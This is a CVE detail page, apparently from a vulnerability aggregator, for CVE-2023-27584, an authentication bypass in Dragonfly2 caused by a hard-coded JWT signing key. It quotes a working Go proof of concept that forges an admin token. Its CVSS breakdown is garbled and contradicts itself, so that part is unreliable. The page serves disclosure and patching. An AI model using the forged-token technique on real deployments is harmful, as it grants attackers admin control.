What is CVE-2023-27584?

### Summary Hello dragonfly maintainer team, I would like to report a security issue concerning your JWT feature. ### Details Dragonfly uses [JWT](https://github.com/dragonflyoss/Dragonfly2/blob/cddcac7e3bdb010811e2b62b3c71d9d5c6749011/manager/middlewares/jwt.go) to verify user. However, the secret key for JWT, "Secret Key", is hard coded, which leads to authentication bypass ```go authMiddleware, err := jwt.New(&jwt.GinJWTMiddleware{ Realm: "Dragonfly", Key: []byte("Secret Key"), Timeout: 2 * 24 * time.Hour, MaxRefresh: 2 * 24 * time.Hour, IdentityKey: identityKey, IdentityHandler: func(c *gin.Context) any { claims := jwt.ExtractClaims(c) id, ok := claims[identityKey] if !ok { c.JSON(http.StatusUnauthorized, gin.H{ "message": "Unavailable token: require user id", }) c.Abort() return nil } c.Set("id", id) return id }) ``` ### PoC Use code below to generate a jwt token ```go package main import ( "errors" "fmt" "time" "github.com/golang-jwt/jwt/v4" ) func (stc *DragonflyTokenClaims) Valid() error { // Verify expiry. if stc.ExpiresAt <= time.Now().UTC().Unix() { vErr := new(jwt.ValidationError) vErr.Inner = errors.New("Token is expired") vErr.Errors |= jwt.ValidationErrorExpired return vErr } return nil } type DragonflyTokenClaims struct { Id int32 `json:"id,omitempty"` ExpiresAt int64 `json:"exp,omitempty"` Issue int64 `json:"orig_iat,omitempty"` } func main() { signingKey := "Secret Key" token := jwt.NewWithClaims(jwt.SigningMethodHS256, &DragonflyTokenClaims{ ExpiresAt: time.Now().Add(time.Hour).Unix(), Id: 1, Issue: time.Now().Unix(), }) signedToken, _ := token.SignedString([]byte(signingKey)) fmt.Println(signedToken) } ``` And send request with JWT above , you can still get data without restriction. ### Impact An attacker can perform any action as a user with admin privileges.

What is the severity of CVE-2023-27584?

CVE-2023-27584 has a CVSS v3 score of 9.8, which is classified as Critical severity.

Is there an exploit available for CVE-2023-27584?

Yes, there are known exploits available for CVE-2023-27584. Immediate patching is recommended.

Is there a patch available for CVE-2023-27584?

Yes, patches are available for CVE-2023-27584. Check the vendor advisories for update instructions.

CVE-2023-27584 - CVE Details, Severity, and Analysis

Q: What is the severity of CVE-2023-27584?

CVE-2023-27584 has a CVSS v3 score of 9.8, which is classified as Critical severity.

Q: Is there an exploit available for CVE-2023-27584?

Yes, there are known exploits available for CVE-2023-27584. Immediate patching is recommended.

Q: Is there a patch available for CVE-2023-27584?

Yes, patches are available for CVE-2023-27584. Check the vendor advisories for update instructions.

Severity Scores

CVSS v39.8

CVSS v20.0

Priority Score819.0

EPSS Score30.0

Critical

Exploitation LikelihoodHigh

30.00%EPSS

High probability of exploitation in the next 30 days

Prioritize patching within days

30.00%

EPSS

9.8

CVSS

Yes

Exploit

Yes

Patch

Critical Priority

high EPSS • exploit exists • critical severity

EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.

Description

Summary

Hello dragonfly maintainer team, I would like to report a security issue concerning your JWT feature.

Details

Dragonfly uses JWT to verify user. However, the secret key for JWT, "Secret Key", is hard coded, which leads to authentication bypass

authMiddleware, err := jwt.New(&jwt.GinJWTMiddleware{
		Realm:       "Dragonfly",
		Key:         []byte("Secret Key"),
		Timeout:     2 * 24 * time.Hour,
		MaxRefresh:  2 * 24 * time.Hour,
		IdentityKey: identityKey,

		IdentityHandler: func(c *gin.Context) any {
			claims := jwt.ExtractClaims(c)

			id, ok := claims[identityKey]
			if !ok {
				c.JSON(http.StatusUnauthorized, gin.H{
					"message": "Unavailable token: require user id",
				})
				c.Abort()
				return nil
			}

			c.Set("id", id)
			return id
		})

PoC

Use code below to generate a jwt token

package main

import (
	"errors"
	"fmt"
	"time"

	"github.com/golang-jwt/jwt/v4"
)

func (stc *DragonflyTokenClaims) Valid() error {
	// Verify expiry.
	if stc.ExpiresAt <= time.Now().UTC().Unix() {
		vErr := new(jwt.ValidationError)
		vErr.Inner = errors.New("Token is expired")
		vErr.Errors |= jwt.ValidationErrorExpired
		return vErr
	}
	return nil
}

type DragonflyTokenClaims struct {
	Id        int32 `json:"id,omitempty"`
	ExpiresAt int64 `json:"exp,omitempty"`
	Issue     int64 `json:"orig_iat,omitempty"`
}

func main() {
	signingKey := "Secret Key"
	token := jwt.NewWithClaims(jwt.SigningMethodHS256, &DragonflyTokenClaims{
		ExpiresAt: time.Now().Add(time.Hour).Unix(),
		Id:        1,
		Issue:     time.Now().Unix(),
	})
	signedToken, _ := token.SignedString([]byte(signingKey))
	fmt.Println(signedToken)
}

And send request with JWT above , you can still get data without restriction. <img width="1241" alt="image" src="https://user-images.githubusercontent.com/70683161/224255896-8604fa70-5846-4fa0-b1f9-db264c5865fe.png">

Impact

An attacker can perform any action as a user with admin privileges.

CVSS v3 Breakdown

Attack Vector:Network

Attack Complexity:Local

Privileges Required:Network

User Interaction:Network

Scope:Unchanged

Confidentiality:High

Integrity:High

Availability:High

Exploit References

Nuclei

Patch References

Github.com Github.com Github.com

Ready for Agentic Automated Testing?

CVE-2023-27584

Summary

Details

PoC

Impact